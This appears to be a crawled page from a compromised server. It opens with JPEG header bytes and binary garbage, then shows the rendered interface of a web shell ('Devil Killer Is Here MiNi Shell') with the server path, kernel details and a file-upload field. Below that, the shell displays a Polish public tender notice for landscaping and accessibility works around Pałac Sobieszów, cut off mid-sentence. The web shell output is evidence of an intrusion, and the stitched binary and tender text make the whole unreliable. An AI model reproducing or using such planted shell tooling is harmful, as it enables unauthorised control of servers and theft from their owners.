JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210830/0016392204-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zagospodarowanie terenu wokół Pałacu Sobieszów na cele edukacyjne,dostosowanie do potrzeb osób niepełnosprawnych poprzez usunięcie barier architektonicznych,wykonanie nawierzchni ścieżek oraz dojazdów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Karkonoski Park Narodowy z siedzibą w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021781314</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chałubińskiego 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-570</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">75 75 53 726</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">75 75 53 348</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kpnmab.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kpnmab.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zagospodarowanie terenu wokół Pałacu Sobieszów na cele edukacyjne,dostosowanie do potrzeb osób niepełnosprawnych poprzez usunięcie barier architektonicznych,wykonanie nawierzchni ścieżek oraz dojazdów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e17f2742-0572-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00163922</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005175/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Wykonanie ścieżki edukacyjnej wokół Pałacu Sobieszów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Infrastruktura i Środowisko 2014 - 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.kpnmab.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.kpnmab.pl<br/><br/>Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej : przetargi@kpnmab.pl z zastrzeżeniem, że złożenie oferty odbywa się wyłącznie przy użyciu miniPortalu. <br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>2. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>3. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty” dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>4. Wszystkie oświadczenia i dokumenty dołączone do oferty w zakresie wskazanym przez Zamawiającego wraz z plikami stanowiącymi ofertę wykonawca skompresuje do jednego pliku archiwum (ZIP). Po skompletowaniu oferty wykonawca jest zobowiązany podpisać ją kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym i musi zaszyfrować ofertę przy pomocy miniPortalu. Oferta będzie zapisywana w formacie .zip, następnie będzie przesyłana do Zamawiającego za pomocą dedykowanych formularzy dostępnych na ePUAP.<br/>5. W przypadku gdy dokumenty elektroniczne w postępowaniu przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020 r. poz. 1913) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku wraz z jednoczesnym zaznaczeniem polecenia na miniPortalu „Załącznik stanowiący tajemnicę przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP). Pliki powinny być odrębnie opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym. Nie można zastrzec informacji, o których mowa w art. 222 ust. 5 Pzp. <br/>6. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik nr 10 do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>7. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia z BZP lub ID postępowania <br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>9. Ofertę składa się pod rygorem nieważności w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych jest Karkonoski Park Narodowy z siedzibą w Jeleniej Górze ul. Chałubińskiego 23; 58-570 Jelenia Góra, tel. 75 75 537 26, adres mail: sekretariat@kpnmab.pl;<br/>2. Inspektorem ochrony danych osobowych w Karkonoskim Parku Narodowym z siedzibą w Jeleniej Górze jest: Leszek Wierzbicki; ido@kpnmab.pl<br/>3. Wskazane dane osobowe przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu związanym z postępowaniem - znak sprawy: KPN/7/2021 prowadzonym w trybie podstawowym bez negocjacji. <br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j Dz. U. z 2021 r., poz. 1129). <br/>5. Wskazane dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p., przez okres do 2028 roku od dnia zakończenia postępowania o udzielenie zamówienia.<br/>6. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>7. W odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. Osoba fizyczna posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>−	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych ;skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna uzna , że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;<br/>9. Osobie fizycznej nie przysługuje :<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1 lit. c RODO. <br/>10. Osobie fizycznej przysługuje prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KPN/7/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy zamówienia obejmuje wykonanie:<br/>-nawierzchni ścieżki edukacyjnej, <br/>-nawierzchni dojazdów i miejsc parkingowych, <br/>-naprawy muru zlokalizowanego przy ścieżce edukacyjnej ,<br/>-oświetlenia ścieżki edukacyjnej,<br/>-elementów wyposażenia ścieżki (tablice wraz z rozszerzeniami)<br/><br/>Nawierzchnia przeznaczona dla ruchu samochodowego będąca elementem ścieżki edukacyjnej wraz z miejscami do parkowania dla osób niepełnosprawnych wykonana zostanie z kostki granitowej, zgodnie z następującym układem warstw: <br/>-kostka granitowa nieregularna 9/11 cm na podsypce cementowo - piaskowej 1:4 o grubości 5 cm, spoiny zamulone zaprawą cementową,<br/>-podbudowa z kruszywa kamiennego 0/31,5 mm o grubości 20 cm,<br/>-warstwa kruszywa lub gruntu stabilizowanego cementem o Rm = 1.5 MPa o grubości 20 cm.<br/>Całkowita grubość nawierzchni z uwzględnianiem warunków przemarzania: 55 cm<br/>Obramowanie krawędzi jezdni krawężnikiem granitowym 12 x 28 cm na ławie betonowej. <br/><br/>Nawierzchnia dla ruchu pieszego będąca elementem ścieżki edukacyjnej wykonana zostanie zgodnie z następującym układem warstw:<br/>-mieszanka kruszyw 0-8 mm o grubości warstwy 3 cm,<br/>-warstwa dynamiczna z kruszywa 0/16 mm o grubości 5 cm,<br/>-warstwa podbudowy z kruszywa łamanego 0/31,5 mm o grubości 15 cm,<br/>-warstwa odsączająca z mieszanki żwirowo-piaskowej o grubości warstwy 15 cm. <br/>Obramowanie krawędzi ścieżki krawężnikiem granitowym 6 x 20 cm na ławie betonowej. <br/><br/>Naprawa muru przy ścieżce edukacyjnej obejmuje:<br/>-nadmurowanie istniejących ścian grubości ok. 40 cm lokalnym kamieniem (granit) na zaprawie cementowej,<br/>-zwieńczenie nadbudowanej ściany nakrywą z płyty kamiennej – granit polerowany grubości 5 cm i szerokości 50 cm, <br/>-montaż poręczy stalowych malowanych proszkowo. <br/><br/>Wykonanie oświetlenia ścieżki edukacyjnej obejmuje:<br/>-inwentaryzacja podziemnej instalacji zasilającej oświetlenie ścieżki edukacyjnej wg rys.nr 3 <br/>-zakup i montaż lamp oświetleniowych i naświetlaczy na słupach wraz z fundamentami wg rys. nr 4,<br/>-podłączenie oświetlenia ścieżki edukacyjnej do instalacji zasilającej wraz z koniecznymi odbiorami.<br/><br/>Elementy wyposażenia ścieżki:<br/>Ścieżka składać się będzie z pięciu tablic wraz z rozszerzeniami tablic. Każda tablica poświęcona będzie innemu zagadnieniu (owoce, zamek, kwiat, drzewo, góry). Tablice oraz rozszerzenia tablic wykonane ze stali składają się z dwóch części: nośnej zafundamentowanej w gruncie oraz części z treścią lub piktogramem przykręconej do części nośnej. <br/>Tablice nr T1,T3,T4,T5 z treścią do grawerowania, wymiary:<br/>- wysokość całkowita 825mm; <br/>-szerokość 500 mm,<br/>- część pochylona 500x350 mm,<br/>- tabliczka z treścią 480x330 mm<br/><br/>Tablica nr T2 z treścią do grawerowania, wymiary:<br/>- wysokość całkowita 1225 mm, <br/>- szerokość 500 mm, <br/>- część pochylona 500x350 mm, <br/>- tabliczka z treścią 480x330 mm<br/><br/> Tablice nr T1,T2,T3,T4,T5 – materiały: <br/>-tablica nośna z blachy stalowej gr. 10 mm zimnowalcowanej, ocynkowanej malowanej proszkowo na kolor ciemno szary RAL 7024.<br/>-tabliczka z treścią z laminatu gr. 2 mm w kolorze białym z czarną warstwą wewnętrzną, treść tabliczki grawerowana laserowo na głębokość ok. 0,5 mm<br/>Fundament tablicy z prefabrykowanego elementu betonowego.<br/><br/>Rozszerzenie do tablicy nr T1<br/>rozszerzenie nr T1.R1<br/>zawartość - Herb Schaffgotschów<br/>wymiary: wysokość ponad gruntem 700 mm, szerokość 400mm, wymiary tabliczki <br/>z herbem 380x530 mm,<br/>materiały: <br/>-element nośny z blachy stalowej gr. 10 mm zimnowalcowanej, ocynkowanej malowanej proszkowo na kolor ciemno szary RAL 7024.<br/>-tabliczka z herbem z laminatu gr. 2 mm w kolorze białym z czarną warstwą wewnętrzną, treść tabliczki grawerowana laserowo na głębokość ok. 0,5 mm<br/>Fundament tablicy z prefabrykowanego elementu betonowego.<br/><br/>Rozszerzenia do tablicy nr T4:<br/>rozszerzenie nr T4.R1<br/>zawartość – Trop zająca <br/>ilość – 8 szt. <br/><br/>rozszerzenie nr T4.R2<br/>zawartość – Trop muflona <br/>ilość – 10 szt. <br/><br/>rozszerzenie nr T4.R3<br/>zawartość – Trop kaczki <br/>ilość – 15 szt.<br/> <br/>rozszerzenie nr T4.R4<br/>zawartość – Trop bekasa <br/>ilość – 10 szt. <br/><br/>wymiary: <br/>wysokość ponad gruntem ok. 150 mm, wymiary tabliczki z tropem Ø 150 mm<br/><br/>materiały: <br/>-element nośny z blachy stalowej gr. 10 mm zimnowalcowanej, ocynkowanej malowanej proszkowo na kolor ciemno szary RAL 7024.<br/>-tabliczka z tropem z laminatu gr. 2 mm w kolorze białym z czarną warstwą wewnętrzną, treść tabliczki grawerowana laserowo na głębokość ok. 0,5 mm<br/>Fundament tablicy z prefabrykowanego elementu betonowego.<br/><br/>Rozszerzenia do tablicy nr T5:<br/>rozszerzenie nr T5.R1<br/>zawartość – ciekawostka o fagocie <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R2<br/>zawartość – ciekawostka o książkach <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R3<br/>zawartość – ciekawostka o horoskopie <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach<br/> <br/>rozszerzenie nr T5.R4<br/>zawartość – ciekawostka o nasionach <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R5<br/>zawartość – ciekawostka o wierzeniach <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R6<br/>zawartość – ciekawostka o krześle <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R7<br/>zawartość – ciekawostka o liściach <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>rozszerzenie nr T5.R8<br/>zawartość – ciekawostka o drewnie <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach<br/> <br/>rozszerzenie nr T5.R9<br/>zawartość – ciekawostka o fotosyntezie <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach<br/> <br/>rozszerzenie nr T5.R10<br/>zawartość – ciekawostka o praniu <br/>ilość – 1 element nośny (strzałka) oraz 2 tabliczki (A i B) z tą samą treścią , do umieszczenia po obu stronach <br/><br/>wymiary: <br/>wysokość ponad gruntem ok 1000 mm, wymiary tabliczki z ciekawostką: 325x80 mm<br/>materiały: <br/>-element nośny z blachy stalowej gr. 10 mm zimnowalcowanej, ocynkowanej malowanej proszkowo na kolor ciemno szary RAL 7024.<br/>-tabliczka z ciekawostką z laminatu gr. 2 mm w kolorze białawym z czarną warstwą wewnętrzną, treść tabliczki grawerowana laserowo na głębokość ok. 0,5 mm<br/>Fundament tablicy z prefabrykowanego elementu betonowego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30195000-2 - Tablice</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45223300-9 - Roboty budowlane w zakresie parkingów</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262512-3 - Kamieniarskie roboty wykończeniowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (0,6);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>	Ccena = (Cmin / C) x 0,6 x 100 pkt<br/> gdzie:<br/> Ccena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/> Cmin - cena w ofercie z najniższą ceną<br/> C - cena w ofercie ocenianej <br/><br/>2)	Kryterium „Gwarancja”:<br/>a)	znaczenie kryterium „Gwarancja” - 40% (0,4)<br/>b)	opis sposobu oceny ofert dla kryterium „gwarancja” <br/> - 4 lata gwarancji - 0 punktów,<br/> - 5 lat gwarancji - 10 punktów,<br/> - 6 lat gwarancji i więcej - 20 punktów.<br/>okres gwarancji powyżej 6 lat nie będzie wyżej punktowany.<br/><br/> Otrzymane punkty w kryterium zostaną podstawione do wzoru <br/>G.gwarancja = (G/Gmax.) x 0,4 x 100 pkt<br/>gdzie:<br/>G. gwarancja - liczba uzyskanych punktów dla kryterium „gwarancja” ocenianej oferty<br/>G. max.- najwyższa przewidziana liczba punktów dla kryterium „gwarancja” z największą ilością punktów z badanych ofert <br/>G – liczba punktów dla kryterium: „gwarancja” oferty ocenianej <br/><br/>Otrzymane punkty z dwóch 